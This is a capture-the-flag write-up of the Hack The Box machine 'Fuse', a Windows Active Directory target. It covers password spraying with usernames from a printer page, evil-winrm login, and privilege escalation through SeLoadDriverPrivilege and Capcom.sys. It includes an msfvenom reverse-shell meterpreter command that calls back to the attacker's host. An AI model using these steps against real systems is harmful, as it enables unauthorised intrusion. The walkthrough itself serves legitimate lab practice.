Fuse has been released on 13th of june in 2020 Fuse is rated as Medium.
From nmap we can see we are dealing with a AD machine, after visiting port 80 we get redirected to a DNS name, adding this DNS name to our HOST file and we were able to view the page, it’s a printer page wich contains print job history with value data like usernames. After poking around a bit we could concluded we needed a password, sinds Kerbroasting attack didn’t work we needed something else. after trying a lot we created a password list from the CSV files from the print page site, turns out there is a valid password in there but the users need to change their password. after password change we were able to enumerate the machine and found some other creds wich gave us a shell by using evil-winrm after login we were able to get the user flag. This user has SeLoadDriverPrivilege enabled wich made us administrator on this machine.
nmap -sV -sC 10.10.10.193
In order to access the webpage, we need to following to /etc/hosts:
When we go to the webpage, we see the following:
By reviewing the CSV files, I found several users:
Enumerating SMB shares
I tried with crackmapexec to enumerate SMB shares with the found usernames. But that was no success.
smb –shares usernames.txt 10.10.10.193
After this I tried if I could login with one of these found usernames.
I tried some common password, also I used the CSV files.
rpcclient -U bhult 10.10.10.193 Fabricorp01
Changing RPC password
smbpasswd -r 10.10.10.193 -U bhult
rpcclient -U bhult 10.10.10.193
svc-print user, we need to keep that in mind.
We found a password:
Now we have credentials, we can use evil-winrm to login with. The only user that could login with the password($fab@s3Rv1ce$1) was svc_print.
I checked if we can use tokens in order to escalate our privileges.
We can see that SeLoadDriverPrivilege is enabled.
We need to follow the instruction which this GitHub page is telling us.
Note: This Github page is owned by IceL0rd. Secwalk won’t/can’t be responsible for any damage or the content.
Uploading Capcom.sys and eoploaddriver64.exe
Before we run this, we need to make an MSF payload which gives is a meterpreter shell.
Getting Meterpreter Shell
In order to generate a meterpreter payload we need to use the following command.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o meterpreter.exe
Now we upload this to the system.
Setting up handler in Metasploit.
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
Now we run meterpreter.exe and we getting a meterpreter shell.
Now we run eoploaddriver64.exe in our evil-winrm shell
./eoploaddriver64.exe System\CurrentControlSet\custom C:\Users\svcprint\Documents\Capcom.sys
Now we have an error, but that’s why we need to use Metasploit, Metasploit has an local exploit that you can abuse this too, we just turned this function to enabled.
Back to our meterpreter session.
set session 1
But to to get this to work we need to edit this script.
We disable the check function.
Now we have rooted the machine.
Made by: IceL0rd
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.